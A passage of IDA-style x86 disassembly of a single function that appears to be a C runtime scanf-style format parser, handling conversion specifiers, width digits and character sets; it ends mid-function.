var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_427878
call __SEH_prolog
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_41557A: ; CODE XREF: sub_41554C+88�j
; sub_41554C+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_415FB9
movzx eax, al
push eax
call sub_41AC35
pop ecx
test eax, eax
jz short loc_4155D6
dec [ebp+var_30]
loc_415598: ; CODE XREF: sub_41554C+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov esi, eax
push esi
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_415598
cmp esi, 0FFFFFFFFh
jz short loc_4155C0
push [ebp+arg_0]
push esi
call sub_41AC6F
pop ecx
pop ecx
loc_4155C0: ; CODE XREF: sub_41554C+67�j
; sub_41554C+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_4155C0
jmp short loc_41557A
; ---------------------------------------------------------------------------
loc_4155D6: ; CODE XREF: sub_41554C+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_415F35
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_415613: ; CODE XREF: sub_41554C+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415634
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_4156CE
; ---------------------------------------------------------------------------
loc_415634: ; CODE XREF: sub_41554C+D7�j
cmp ebx, 4Eh
jg short loc_4156AC
jz loc_4156CE
cmp ebx, 2Ah
jz short loc_4156A7
cmp ebx, 46h
jz loc_4156CE
cmp ebx, 49h
jz short loc_41565C
cmp ebx, 4Ch
jnz short loc_4156BB
inc [ebp+var_4F]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41565C: ; CODE XREF: sub_41554C+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_41567B
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_41567B
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41567B: ; CODE XREF: sub_41554C+116�j
; sub_41554C+11E�j
cmp cl, 33h
jnz short loc_41568C
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_41568C
mov esi, eax
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_41568C: ; CODE XREF: sub_41554C+132�j
; sub_41554C+13A�j
cmp cl, 64h
jz short loc_4156CE
cmp cl, 69h
jz short loc_4156CE
cmp cl, 6Fh
jz short loc_4156CE
cmp cl, 78h
jz short loc_4156CE
cmp cl, 58h
jnz short loc_4156BB
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156A7: ; CODE XREF: sub_41554C+F6�j
inc [ebp+var_4B]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156AC: ; CODE XREF: sub_41554C+EB�j
cmp ebx, 68h
jz short loc_4156C8
cmp ebx, 6Ch
jz short loc_4156C0
cmp ebx, 77h
jz short loc_4156C3
loc_4156BB: ; CODE XREF: sub_41554C+109�j
; sub_41554C+157�j
inc [ebp+var_4C]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156C0: ; CODE XREF: sub_41554C+168�j
inc [ebp+var_4F]
loc_4156C3: ; CODE XREF: sub_41554C+16D�j
inc [ebp+var_4E]
jmp short loc_4156CE
; ---------------------------------------------------------------------------
loc_4156C8: ; CODE XREF: sub_41554C+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_4156CE: ; CODE XREF: sub_41554C+E3�j
; sub_41554C+ED�j ...
cmp [ebp+var_4C], 0
jz loc_415613
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_4156F8
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_4156FB
; ---------------------------------------------------------------------------
loc_4156F8: ; CODE XREF: sub_41554C+196�j
mov ebx, [ebp+var_64]
loc_4156FB: ; CODE XREF: sub_41554C+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_415719
mov al, [esi]
cmp al, 53h
jz short loc_415715
cmp al, 43h
jz short loc_415715
or [ebp+var_4E], 0FFh
jmp short loc_415719
; ---------------------------------------------------------------------------
loc_415715: ; CODE XREF: sub_41554C+1BD�j
; sub_41554C+1C1�j
mov [ebp+var_4E], 1
loc_415719: ; CODE XREF: sub_41554C+1B7�j
; sub_41554C+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_415750
cmp edi, 63h
jz loc_4157B0
cmp edi, 7Bh
jz short loc_4157B0
loc_415735: ; CODE XREF: sub_41554C+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov esi, eax
push esi
call sub_41AC35
pop ecx
test eax, eax
jnz short loc_415735
mov [ebp+var_28], esi
loc_415750: ; CODE XREF: sub_41554C+1D9�j
mov esi, [ebp+arg_0]
loc_415753: ; CODE XREF: sub_41554C+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_415764
cmp [ebp+var_48], 0
jz loc_4159B9
loc_415764: ; CODE XREF: sub_41554C+20C�j
cmp edi, 6Fh
jg loc_415988
jz loc_415CFB
cmp edi, 63h
jz loc_415967
cmp edi, 64h
jz loc_415CFB
jle loc_4159AE
cmp edi, 67h
jle short loc_4157DA
cmp edi, 69h
jz short loc_4157C2
cmp edi, 6Eh
jnz loc_4159AE
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_415F0D
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_4157B0: ; CODE XREF: sub_41554C+1DE�j
; sub_41554C+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_415536
mov [ebp+var_28], eax
jmp short loc_415753
; ---------------------------------------------------------------------------
loc_4157C2: ; CODE XREF: sub_41554C+247�j
push 64h
pop edi
loc_4157C5: ; CODE XREF: sub_41554C+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_415BF4
mov [ebp+var_4A], 1
jmp loc_415BF9
; ---------------------------------------------------------------------------
loc_4157DA: ; CODE XREF: sub_41554C+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4157F6
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_4157FB
; ---------------------------------------------------------------------------
loc_4157F6: ; CODE XREF: sub_41554C+29A�j
cmp ebx, 2Bh
jnz short loc_415812
loc_4157FB: ; CODE XREF: sub_41554C+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_415815
; ---------------------------------------------------------------------------
loc_415812: ; CODE XREF: sub_41554C+2AD�j
mov edi, [ebp+arg_0]
loc_415815: ; CODE XREF: sub_41554C+2C4�j
cmp [ebp+var_44], 0
jz short loc_415824
cmp [ebp+var_48], 15Dh
jle short loc_41584C
loc_415824: ; CODE XREF: sub_41554C+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_41584C
; ---------------------------------------------------------------------------
loc_41582D: ; CODE XREF: sub_41554C+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_415857
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_41584C: ; CODE XREF: sub_41554C+2D6�j
; sub_41554C+2DF�j
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_41582D
loc_415857: ; CODE XREF: sub_41554C+2E9�j
cmp byte_42D090, bl
jnz short loc_4158A9
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4158A9
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov al, byte_42D090
mov [esi], al
inc esi
jmp short loc_41589B
; ---------------------------------------------------------------------------
loc_41587F: ; CODE XREF: sub_41554C+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4158A9
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
loc_41589B: ; CODE XREF: sub_41554C+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_41587F
loc_4158A9: ; CODE XREF: sub_41554C+311�j
; sub_41554C+31B�j ...
cmp [ebp+var_40], 0
jz short loc_41591E
cmp ebx, 65h
jz short loc_4158B9
cmp ebx, 45h
jnz short loc_41591E
loc_4158B9: ; CODE XREF: sub_41554C+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41591E
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_4158E0
mov [esi], al
inc esi
jmp short loc_4158E5
; ---------------------------------------------------------------------------
loc_4158E0: ; CODE XREF: sub_41554C+38D�j
cmp ebx, 2Bh
jnz short loc_415913
loc_4158E5: ; CODE XREF: sub_41554C+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_415904
and [ebp+var_48], eax
jmp short loc_415913
; ---------------------------------------------------------------------------
loc_4158F4: ; CODE XREF: sub_41554C+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41591E
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_415904: ; CODE XREF: sub_41554C+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_415913: ; CODE XREF: sub_41554C+397�j
; sub_41554C+3A6�j
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_4158F4
loc_41591E: ; CODE XREF: sub_41554C+361�j
; sub_41554C+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_41592F
push edi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_41592F: ; CODE XREF: sub_41554C+3D8�j
cmp [ebp+var_40], 0
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz loc_415F2D
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_42CE20
add esp, 0Ch
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415967: ; CODE XREF: sub_41554C+22A�j
test ecx, ecx
jnz short loc_415975
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_415975: ; CODE XREF: sub_41554C+41D�j
; sub_41554C+44A�j
cmp [ebp+var_4E], 0
jle loc_415B00
mov [ebp+var_4D], 1
jmp loc_415B00
; ---------------------------------------------------------------------------
loc_415988: ; CODE XREF: sub_41554C+21B�j
mov eax, edi
sub eax, 70h
jz loc_415CF7
sub eax, 3
jz short loc_415975
dec eax
dec eax
jz loc_415CFB
sub eax, 3
jz loc_4157C5
sub eax, 3
jz short loc_4159DA
loc_4159AE: ; CODE XREF: sub_41554C+239�j
; sub_41554C+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_4159C2
loc_4159B9: ; CODE XREF: sub_41554C+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_415F89
; ---------------------------------------------------------------------------
loc_4159C2: ; CODE XREF: sub_41554C+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_415F2D
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_4159DA: ; CODE XREF: sub_41554C+460�j
cmp [ebp+var_4E], 0
jle short loc_4159E4
mov [ebp+var_4D], 1
loc_4159E4: ; CODE XREF: sub_41554C+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_415A01
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_415A01: ; CODE XREF: sub_41554C+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_415A59
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_415A59
; ---------------------------------------------------------------------------
loc_415A21: ; DATA XREF: .rdata:stru_427878�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_415A25: ; DATA XREF: .rdata:stru_427878�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
push 20h
call sub_41344D
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_415A45
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_415FB9
; ---------------------------------------------------------------------------
loc_415A45: ; CODE XREF: sub_41554C+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_415A59: ; CODE XREF: sub_41554C+4BA�j
; sub_41554C+4D3�j
push 20h
push 0
push ebx
call sub_41ADD0
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_415AE0
cmp byte ptr [edi], 5Dh
jnz short loc_415AE0
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_415AE3
; ---------------------------------------------------------------------------
loc_415A7A: ; CODE XREF: sub_41554C+59B�j
inc edi
cmp al, 2Dh
jnz short loc_415ACA
test dl, dl
jz short loc_415ACA
mov cl, [edi]
cmp cl, 5Dh
jz short loc_415ACA
inc edi
cmp dl, cl
jnb short loc_415A93
mov al, cl
jmp short loc_415A97
; ---------------------------------------------------------------------------
loc_415A93: ; CODE XREF: sub_41554C+541�j
mov al, dl
mov dl, cl
loc_415A97: ; CODE XREF: sub_41554C+545�j
cmp dl, al
ja short loc_415AC6
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_415AAB: ; CODE XREF: sub_41554C+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_415AAB
loc_415AC6: ; CODE XREF: sub_41554C+54D�j
xor dl, dl
jmp short loc_415AE3
; ---------------------------------------------------------------------------
loc_415ACA: ; CODE XREF: sub_41554C+531�j
; sub_41554C+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_415AE0: ; CODE XREF: sub_41554C+51E�j
; sub_41554C+523�j
mov dl, [ebp+var_39]
loc_415AE3: ; CODE XREF: sub_41554C+52C�j
; sub_41554C+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_415A7A
test al, al
jz loc_415FB9
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_415AFD
mov [ebp+arg_4], edi
loc_415AFD: ; CODE XREF: sub_41554C+5AC�j
mov edi, [ebp+var_68]
loc_415B00: ; CODE XREF: sub_41554C+42D�j
; sub_41554C+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_415B18
push [ebp+arg_0]
push [ebp+var_28]
call sub_41AC6F
pop ecx
pop ecx
loc_415B18: ; CODE XREF: sub_41554C+5BD�j
; sub_41554C+754�j ...
cmp [ebp+var_44], 0
jz short loc_415B2C
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_415CBE
loc_415B2C: ; CODE XREF: sub_41554C+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_415CAB
cmp edi, 63h
jz short loc_415B8C
cmp edi, 73h
jnz short loc_415B5C
cmp eax, 9
jl short loc_415B57
cmp eax, 0Dh
jle short loc_415B5C
loc_415B57: ; CODE XREF: sub_41554C+604�j
cmp eax, 20h
jnz short loc_415B8C
loc_415B5C: ; CODE XREF: sub_41554C+5FF�j
; sub_41554C+609�j
cmp edi, 7Bh
jnz loc_415CAB
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_415CAB
mov edi, [ebp+var_68]
loc_415B8C: ; CODE XREF: sub_41554C+5FA�j
; sub_41554C+60E�j
cmp [ebp+var_4B], 0
jnz loc_415CA5
cmp [ebp+var_4D], 0
jz loc_415C9A
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_42CE30
test byte ptr [ecx+eax*2+1], 80h
jz short loc_415BC7
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov [ebp+var_1D3], al
loc_415BC7: ; CODE XREF: sub_41554C+668�j
push dword_42D08C
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41AD9B
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_415C9D
; ---------------------------------------------------------------------------
loc_415BF4: ; CODE XREF: sub_41554C+27F�j
cmp ebx, 2Bh
jnz short loc_415C17
loc_415BF9: ; CODE XREF: sub_41554C+289�j
dec [ebp+var_48]
jnz short loc_415C08
test ecx, ecx
jz short loc_415C08
mov [ebp+var_4C], 1
jmp short loc_415C17
; ---------------------------------------------------------------------------
loc_415C08: ; CODE XREF: sub_41554C+6B0�j
; sub_41554C+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_415C17: ; CODE XREF: sub_41554C+6AB�j
; sub_41554C+6BA�j
cmp ebx, 30h
jnz loc_415D2C
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_415C74
cmp bl, 58h
jz short loc_415C74
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_415C5B
cmp [ebp+var_44], 0
jz short loc_415C53
dec [ebp+var_48]
jnz short loc_415C53
inc [ebp+var_4C]
loc_415C53: ; CODE XREF: sub_41554C+6FD�j
; sub_41554C+702�j
push 6Fh
loc_415C55: ; CODE XREF: sub_41554C+74C�j
pop edi
jmp loc_415D2C
; ---------------------------------------------------------------------------
loc_415C5B: ; CODE XREF: sub_41554C+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415C6C
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415C6C: ; CODE XREF: sub_41554C+715�j
push 30h
pop ebx
jmp loc_415D29
; ---------------------------------------------------------------------------
loc_415C74: ; CODE XREF: sub_41554C+6E6�j
; sub_41554C+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_415C96
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_415C96
inc [ebp+var_4C]
loc_415C96: ; CODE XREF: sub_41554C+73B�j
; sub_41554C+745�j
push 78h
jmp short loc_415C55
; ---------------------------------------------------------------------------
loc_415C9A: ; CODE XREF: sub_41554C+64E�j
mov [ebx], al
inc ebx
loc_415C9D: ; CODE XREF: sub_41554C+6A3�j
mov [ebp+var_64], ebx
jmp loc_415B18
; ---------------------------------------------------------------------------
loc_415CA5: ; CODE XREF: sub_41554C+644�j
inc esi
jmp loc_415B18
; ---------------------------------------------------------------------------
loc_415CAB: ; CODE XREF: sub_41554C+5F1�j
; sub_41554C+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_415CBE
push [ebp+arg_0]
push eax
call sub_41AC6F
pop ecx
pop ecx
loc_415CBE: ; CODE XREF: sub_41554C+5DA�j
; sub_41554C+765�j
cmp esi, ebx
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz loc_415F2D
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_415F2D
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_415CEF
and word ptr [eax], 0
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415CEF: ; CODE XREF: sub_41554C+798�j
and byte ptr [eax], 0
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415CF7: ; CODE XREF: sub_41554C+441�j
mov [ebp+var_4F], 1
loc_415CFB: ; CODE XREF: sub_41554C+221�j
; sub_41554C+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_415D09
mov [ebp+var_4A], 1
jmp short loc_415D0E
; ---------------------------------------------------------------------------
loc_415D09: ; CODE XREF: sub_41554C+7B5�j
cmp ebx, 2Bh
jnz short loc_415D2C
loc_415D0E: ; CODE XREF: sub_41554C+7BB�j
dec [ebp+var_48]
jnz short loc_415D1D
test ecx, ecx
jz short loc_415D1D
mov [ebp+var_4C], 1
jmp short loc_415D2C
; ---------------------------------------------------------------------------
loc_415D1D: ; CODE XREF: sub_41554C+7C5�j
; sub_41554C+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
loc_415D29: ; CODE XREF: sub_41554C+723�j
mov [ebp+var_28], ebx
loc_415D2C: ; CODE XREF: sub_41554C+6CE�j
; sub_41554C+70A�j ...
cmp [ebp+var_54], 0
jz loc_415E31
cmp [ebp+var_4C], 0
jnz loc_415E0F
loc_415D40: ; CODE XREF: sub_41554C+8BA�j
cmp edi, 78h
jz short loc_415D8B
cmp edi, 70h
jz short loc_415D8B
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415DBC
cmp edi, 6Fh
jnz short loc_415D74
cmp ebx, 38h
jge short loc_415DBC
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415D74: ; CODE XREF: sub_41554C+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_4162D0
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415D8B: ; CODE XREF: sub_41554C+7F7�j
; sub_41554C+7FC�j
push ebx
call sub_41ABF6
pop ecx
test eax, eax
jz short loc_415DBC
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_415DBF
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415DBC: ; CODE XREF: sub_41554C+807�j
; sub_41554C+811�j ...
inc [ebp+var_4C]
loc_415DBF: ; CODE XREF: sub_41554C+826�j
; sub_41554C+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_415DF1
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_415DE3
dec [ebp+var_48]
jnz short loc_415DE3
mov [ebp+var_4C], 1
jmp short loc_415E02
; ---------------------------------------------------------------------------
loc_415DE3: ; CODE XREF: sub_41554C+88A�j
; sub_41554C+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
jmp short loc_415E02
; ---------------------------------------------------------------------------
loc_415DF1: ; CODE XREF: sub_41554C+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415E02
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415E02: ; CODE XREF: sub_41554C+895�j
; sub_41554C+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_415D40
mov [ebp+var_28], ebx
loc_415E0F: ; CODE XREF: sub_41554C+7EE�j
cmp [ebp+var_4A], 0
jz loc_415EEB
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_415EEB
; ---------------------------------------------------------------------------
loc_415E31: ; CODE XREF: sub_41554C+7E4�j
cmp [ebp+var_4C], 0
jnz loc_415EE2
loc_415E3B: ; CODE XREF: sub_41554C+98D�j
cmp edi, 78h
jz short loc_415E6D
cmp edi, 70h
jz short loc_415E6D
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415E8F
cmp edi, 6Fh
jnz short loc_415E60
cmp ebx, 38h
jge short loc_415E8F
shl [ebp+var_38], 3
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E60: ; CODE XREF: sub_41554C+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E6D: ; CODE XREF: sub_41554C+8F2�j
; sub_41554C+8F7�j
push ebx
call sub_41ABF6
pop ecx
test eax, eax
jz short loc_415E8F
shl [ebp+var_38], 4
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_415E92
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E8F: ; CODE XREF: sub_41554C+902�j
; sub_41554C+90C�j ...
inc [ebp+var_4C]
loc_415E92: ; CODE XREF: sub_41554C+912�j
; sub_41554C+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_415EC4
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_415EB6
dec [ebp+var_48]
jnz short loc_415EB6
mov [ebp+var_4C], 1
jmp short loc_415ED5
; ---------------------------------------------------------------------------
loc_415EB6: ; CODE XREF: sub_41554C+95D�j
; sub_41554C+962�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
jmp short loc_415ED5
; ---------------------------------------------------------------------------
loc_415EC4: ; CODE XREF: sub_41554C+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415ED5
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415ED5: ; CODE XREF: sub_41554C+968�j
; sub_41554C+976�j ...
cmp [ebp+var_4C], 0
jz loc_415E3B
mov [ebp+var_28], ebx
loc_415EE2: ; CODE XREF: sub_41554C+8E9�j
cmp [ebp+var_4A], 0
jz short loc_415EEB
neg [ebp+var_38]
loc_415EEB: ; CODE XREF: sub_41554C+8C7�j
; sub_41554C+8E0�j ...
cmp edi, 46h
jnz short loc_415EF4
and [ebp+var_40], 0
loc_415EF4: ; CODE XREF: sub_41554C+9A2�j
cmp [ebp+var_40], 0
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz short loc_415F2D
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_415F0D: ; CODE XREF: sub_41554C+259�j
cmp [ebp+var_54], 0
jz short loc_415F20
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_415F2D
; ---------------------------------------------------------------------------
loc_415F20: ; CODE XREF: sub_41554C+9C5�j
cmp [ebp+var_4F], 0
jz short loc_415F2A
mov [ebx], eax
jmp short loc_415F2D
; ---------------------------------------------------------------------------
loc_415F2A: ; CODE XREF: sub_41554C+9D8�j
mov [ebx], ax
loc_415F2D: ; CODE XREF: sub_41554C+25F�j
; sub_41554C+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_415F9D
; ---------------------------------------------------------------------------
loc_415F35: ; CODE XREF: sub_41554C+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
